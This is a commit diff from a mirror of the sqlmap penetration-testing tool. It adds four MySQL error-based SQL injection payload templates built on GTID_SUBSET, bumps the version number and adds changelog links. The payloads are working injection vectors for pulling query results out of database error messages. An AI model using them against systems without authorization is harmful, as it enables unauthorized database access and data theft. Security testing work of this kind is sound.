mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-28 04:23:50 +03:00
Adding new payload (credits: blackfan.ru)
This commit is contained in:
parent
67f918f6ad
commit
6b7a1dfd94
|
@ -91,6 +91,46 @@
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)</title>
|
||||||
|
<stype>2</stype>
|
||||||
|
<level>4</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1,2,3,8,9</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>AND GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
|
||||||
|
<request>
|
||||||
|
<payload>AND GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>MySQL</dbms>
|
||||||
|
<dbms_version>>= 5.6</dbms_version>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)</title>
|
||||||
|
<stype>2</stype>
|
||||||
|
<level>4</level>
|
||||||
|
<risk>3</risk>
|
||||||
|
<clause>1,8,9</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>OR GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
|
||||||
|
<request>
|
||||||
|
<payload>OR GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>MySQL</dbms>
|
||||||
|
<dbms_version>>= 5.6</dbms_version>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)</title>
|
<title>MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)</title>
|
||||||
<stype>2</stype>
|
<stype>2</stype>
|
||||||
|
@ -886,6 +926,26 @@
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)</title>
|
||||||
|
<stype>2</stype>
|
||||||
|
<level>5</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1,2,3,9</clause>
|
||||||
|
<where>3</where>
|
||||||
|
<vector>GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
|
||||||
|
<request>
|
||||||
|
<payload>GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>MySQL</dbms>
|
||||||
|
<dbms_version>>= 5.6</dbms_version>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)</title>
|
<title>MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)</title>
|
||||||
<stype>2</stype>
|
<stype>2</stype>
|
||||||
|
@ -1155,6 +1215,26 @@
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)</title>
|
||||||
|
<stype>2</stype>
|
||||||
|
<level>5</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>2,3</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>,GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
|
||||||
|
<request>
|
||||||
|
<payload>,GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>MySQL</dbms>
|
||||||
|
<dbms_version>>= 5.6</dbms_version>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)</title>
|
<title>MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)</title>
|
||||||
<stype>2</stype>
|
<stype>2</stype>
|
||||||
|
|
|
@ -6,14 +6,17 @@
|
||||||
# Version 1.3 (2019-01-05)
|
# Version 1.3 (2019-01-05)
|
||||||
|
|
||||||
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.2...1.3)
|
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.2...1.3)
|
||||||
|
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/4?closed=1)
|
||||||
|
|
||||||
# Version 1.2 (2018-01-08)
|
# Version 1.2 (2018-01-08)
|
||||||
|
|
||||||
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.1...1.2)
|
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.1...1.2)
|
||||||
|
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/3?closed=1)
|
||||||
|
|
||||||
# Version 1.1 (2017-04-07)
|
# Version 1.1 (2017-04-07)
|
||||||
|
|
||||||
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.0...1.1)
|
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.0...1.1)
|
||||||
|
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/2?closed=1)
|
||||||
|
|
||||||
# Version 1.0 (2016-02-27)
|
# Version 1.0 (2016-02-27)
|
||||||
|
|
||||||
|
|
|
@ -18,7 +18,7 @@ from lib.core.enums import OS
|
||||||
from thirdparty.six import unichr as _unichr
|
from thirdparty.six import unichr as _unichr
|
||||||
|
|
||||||
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
||||||
VERSION = "1.4.7.4"
|
VERSION = "1.4.7.5"
|
||||||
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
||||||
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
||||||
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
||||||
|
|
Loading…
Reference in New Issue
Block a user